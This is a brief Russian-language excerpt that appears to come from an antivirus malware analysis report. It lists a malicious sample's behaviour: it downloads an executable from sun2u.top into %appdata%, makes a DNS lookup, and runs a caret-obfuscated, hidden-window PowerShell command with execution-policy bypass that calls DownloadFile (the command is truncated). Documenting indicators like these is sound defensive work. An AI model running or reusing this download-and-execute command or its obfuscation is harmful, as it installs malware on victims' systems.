Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^Owe^rS^HeLl.EX^e^ ^-E^X^E^c^U^t^IOnPOlicY byp^A^SS -NOpR^Of^I^LE^ ^-^Wi^n^d^ow^StylE^ HiddE^n^ (Ne^W-obJeCt^ SYS^Te^M.nE^t^.WebC^liE^nT^)^.do^WN^l^OA^d^fiLe(^'http://sun2u.t...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /C "P^Owe^rS^HeLl.EX^e^ ^-E^X^E^c^U^t^IOnPOlicY byp^A^SS -NOpR^Of^I^LE^ ^-^Wi^n^d^ow^StylE^ HiddE^n^ (Ne^W-obJeCt^ SYS^Te^M.nE^t^.WebC^liE^nT^)^.do^WN^l^OA^d^fiLe(^'http://sun2u.t...' (со скрытым окном)